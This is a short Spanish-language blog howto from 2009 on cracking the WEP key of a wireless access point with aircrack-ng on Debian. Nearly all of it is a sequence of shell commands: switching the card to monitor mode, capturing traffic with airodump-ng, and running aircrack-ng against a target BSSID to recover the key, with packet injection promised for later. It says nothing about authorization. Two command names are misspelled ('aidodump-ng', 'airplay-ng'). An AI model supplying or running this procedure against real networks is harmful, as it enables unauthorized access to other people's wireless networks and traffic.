Como hackear un AP con WEP utilizando aircrack-ng y nuestro Debian GNU/Linux - Howto crack Wep Access Point
8 11 2009
Antes de empezar les dejo los pre-requisitos para poder seguir los pasos:
- Utilizar una tarjeta wifi que permita utilizarla en modo promiscuo “promiscue mode” o monitor. En este caso la tarjeta solo escucha los paquetes sin transmitir datos.
- Tener instalado el paquete aircrack-ng. En caso de no tenerlo lo instalamos:
# apt-get install aircrack-ng
Ahora a trabajar!
Creamos un directorio de trabajo
# mkdir capturas
Quitamos nuestra interface si existe
# wlanconfig ath0 destroy
Creamos la nueva interface en modo promiscuo
# wlanconfig ath0 create wlandev wifi0 wlanmode monitor
Escuchamos los AP’s (Access Points / Puntos de Acceso) cercanos
# airodump-ng ath0
En la salida podremos ver los campos BSSID y CH: BSSID es el Mac Address del AP y CH es el canal
Ponemos nuestra tarjeta a escuchar en el canal 1
# aidodump-ng -c 1 -w dump ath0
Vemos los archivos generados:
# ls
dump-01.cap dump-01.txt
Ahora para poder analizar esos archivos y ver si es posible obtener la clave del AP
# aircrack-ng -b 00:11:22:33:44:55 dump-01.cap
Si la cantidad de paquetes obtenidos fue suficiente para obtener la clave en pocos segundos tendremos la salida, en caso contrario podemos utilizar el paquete airplay-ng para inyectar paquetes, pero eso lo veremos mas adelante.
Para volver todo a su normalidad:
# wlanconfig ath0 destroy
# wlanconfig ath0 create wlandev wifi0 wlanmode station
